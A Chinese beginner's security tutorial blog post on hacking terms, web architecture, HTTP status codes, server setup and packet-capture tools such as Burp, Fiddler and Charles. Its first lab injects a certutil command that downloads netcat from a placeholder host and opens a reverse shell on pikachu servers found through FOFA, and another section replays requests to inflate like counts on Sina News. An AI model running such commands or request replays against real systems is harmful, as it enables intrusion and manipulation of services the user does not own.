安全基础从0开始

文章目录

常见名词

前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,

反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK等

名词解释

小实战

  • fofa暗网浏览器中,使用"pikachu" && country="CN" && title="Get the pikachu"命令,查询在线pikachu服务器,进入测试命令执行漏洞

  • 执行命令,查看回显

  • 查看本机是哪种服务器,接着使用下载命令,将远程连接nc下载到本地,并命名为n.exe
    文档下载命令转换

  • 选择CMD下载命令,复制命令,使用命令执行127.0.0.1 & certutil.exe -urlcache -split -f http://www.xxx.com:80/nc.exe n.exe,出现以下,表示下载完成,也可以使用dir查看

  • 接着在想要反弹shell的电脑上使用命令 nc -lvvp 端口号(5566)监听端口;在肉机上用nc -e /bin/sh(或cmd) 目标ip 5566;成功连接上远端服务器。

网站搭建

Web应用&架构搭建&漏洞概念&HTTP

Web应用&架构

理解不同WEB应用组成角色功能架构:

开发语言,程序源码,中间件容器,数据库类型,服务器操作系统,第三方软件等

开发语言:asp,php,aspx,jsp,java,python,ruby,go,html,javascript等

程序源码:根据开发语言分类;应用类型分类;开源CMS分类;开发框架分类等

中间件容器:IIS,Apache,Nginx,Tomcat,Weblogic,Jboos,glasshfish等

数据库类型:Access,Mysql,Mssql,Oracle,db2,Sybase,Redis,MongoDB等

服务器操作系统:Windows系列,Linux系列,Mac系列等

第三方软件:phpmyadmin,vs-ftpd,VNC,ELK,Openssh等

小实战

一个好玩的东西,新浪新闻点赞,在不登陆的情况下只能点赞一次,究其原因应该是浏览器前端问题,可以刷新页面继续点赞,也可以截取数据包,多次发送就能解决仅能发送一次的问题。

  • 已经点赞后,无论如何去点都无法再次增加点赞量,此时的点赞量为229。
  • 开启burpsuite抓包,并右键送至中继器(repeater)

  • 关闭抓包,在repeater中继续send数据包,刷新网页查看点赞量,此时的点赞量已经到了250次了。

抓包模拟器

在PC端显现出来的浏览器与手机端浏览器显现出来的不同,使用burpsuite抓包,观看数据包的区别。

  • burpsuite中配置代理,其中127是本地浏览器抓包,10是对该计算机局域网内进行抓包(特指模拟器)
  • 模拟器更改配置,代理--手动代理服务器主机名改为本机IP地址,dialing端口与上述一致,为8888,如下:
  • 分别在PC端与模拟器上抓包,让数据流经burp抓包工具,如下:

通过User-Agent可知其发生差异的原因

状态码返回值

参考文章1
参考文章2
400:发送请求有语法错误
403:文件夹存在,没有权限访问
404:访问资源不存在(文件/文件夹)
3xx:跳转,处置过程,判断可有可无

重定向(302)
5xx:内部错误,服务器问题,判断可有可无

500.服务器内部异常

504.服务器请求超时,没有返回结果

在对目标进行扫描时,尽量勾选它们,为了不放过任何结果,需要进行扫描

购买快代理,可以随时更换ip,防止ip被封禁,也可以实现VPN的功效。

网站搭建

安装的前提条件:

  • 拥有一台自己的服务器和属于自己的域名(域名要进行备案,如果不备案只能在大陆之外进行访问)
  • 服务器安装宝塔集成环境,方便操作使用
  • 选用远程连接工具,可以使用Windows自带的远程连接,也可以使用FinalShell进行连接,在远程服务器上进行操作

选择安装

选用Windows搭建:

  • 使用远端mstsc进行搭建,域名没有在国内备案,在阿里云选用大陆之外的云服务器
    选用按量收费,双核4G,服务器选用Windows版本
  • 确认下单之后,配置安全组,配置服务器密码,这些后期都能进行配置
  • 在服务器上下载宝塔,需要注册,在域名处提前配置好,将域名访问映射到服务器的ip,宝塔账号密码是随机的
  • 直接关掉该页面,会出现控制面板工具,复制面板地址到本机浏览器,开始网站的部署。
  • 进入以下界面,可以选择傻瓜式安装,也可以自己进行配置安装,在软件商店中选择。

    Win参考连接
    Linux参考连接

WEB应用安全漏洞

Web应用安全漏洞分类

SQL注入,文件安全,RCE执行,XSS跨站,CSRF/SSRF/CRLF,

反序列化,逻辑越权,未授权访问,XXE/XML,弱口令安全等

安全漏洞解释

数据包&封包&信息收集

参考连接

抓包的意义: 在我们安全测试中,对方可能会提供相对应的ip 地址,域名等等,那么有的应用是不会给你的,当在你测试的时候是不知道对方的目标名字什么的,那么我们就可以通过抓取数据包来获得你想要的信息,例如,对方主机/ip,或者与其相关的信息。

抓包的对象: 那么抓包他主要是针对协议去抓取的,根据不同的协议配对不同的抓包工具,就好比我们的网站他可以用BURP抓包工具,那么我们的APP或者小程序,它就不行了我们的BURP就抓取不到,为什么,因为我们的APP/小程序他走的不是HTTP协议的,所有抓取不到。

抓包的协议: 抓包的协议呢,就是我们的APP,它也可以是HTTP协议的走向,因为我们的HTML5就能做出APP,那么我们HTML5他的走向协议就是http协议,那个APP点开其实就是打开网站了,你留心可以发现,网站有一些网站和我们点开APP十分像

抓包的支持: 其实就是目标他支持哪些抓包工具,支持哪些协议

封包的意义: 封包他就能自定义我们的一个数据包,封包技术说简单也不简单,就是将一系列操作封装为数据包,方便使用,很多我们的外挂都用到封包技术,就相当于说你自定义一个数据包封装发送给服务器

参考点

Fiddler:

是一个http协议调试代理工具,它能够记录并检查所有你的电脑和互联网之间的http通讯,设置断点,查看所有的"进出"Fiddler的数据(指cookie,html,js,css等文件)。 Fiddler 要比其他的网络调试器要更加简单,因为它不仅仅暴露http通讯还提供了一个用户友好的格式。

手机证书安装,需要将防火墙关闭,安装证书步骤参考

Charles:

是一个HTTP代理服务器,HTTP监视器,反转代理服务器,当浏览器连接Charles的代理访问互联网时,Charles可以监控浏览器发送和接收的所有数据。它允许一个开发者查看所有连接互联网的HTTP通信,这些包括request, response和HTTP headers (包含cookies与caching信息)。

在模拟器中添加证书,help -->SSLproxying --> save Charles root certificate,保存之后,在模拟器中保存到文件夹中,接着设置-安全-(加密与凭据)用户凭据-从存储设备安装 / 设置-WALN-更多WALN设置-安装证书,接着会让输入密码,安装就能抓包。

抓取的包全部出现unknow的解决方法:

proxy --> SSL Proxying Settings --> Add

来添加主机和端口,

如果个别情况出现unknow,可能是本身抓包软件存在个别漏抓问题。可以忽略

从左到右分别为:

(1)清除当前会话

(2)开始记录

(3)开启SSL代理

(4)开始限流/停止限流

(5)开始断点/停止断点

(6)根据所写内容撰写新请求

(7)重发选定请求

(8)工具

(9)设置

Charles 激活码在线计算器
ios配置代理
ios下载证书问题
burp+逍遥模拟器 app抓包

TCPDump:

是可以将网络中传送的数据包完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。

BurpSuite:

是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

Wireshark:

是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。

WireShark使用教程

科来网络分析系统:

是一款由科来软件全自主研发,并拥有全部知识产品的网络分析产品。该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故障、安全及性能问题。

WPE&封包分析:

是强大的网络封包编辑器,wpe可以截取网络上的信息,修改封包数据,是外挂制作的常用工具。一般在安全测试中可用来调试数据通讯地址。

封包拦截器
封包监听工具

Charles (茶杯)
https://blog.csdn.net/weixin_45459427/article/details/108393878

Fidder
https://blog.csdn.net/weixin_45043349/article/details/120088449

BurpSuite
https://blog.csdn.net/qq_36658099/article/details/81487491

相关推荐
用户962377954482 分钟前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机3 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机3 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954485 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star5 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954488 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行5 天前
网络安全总结
安全·web安全
red1giant_star5 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透5 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全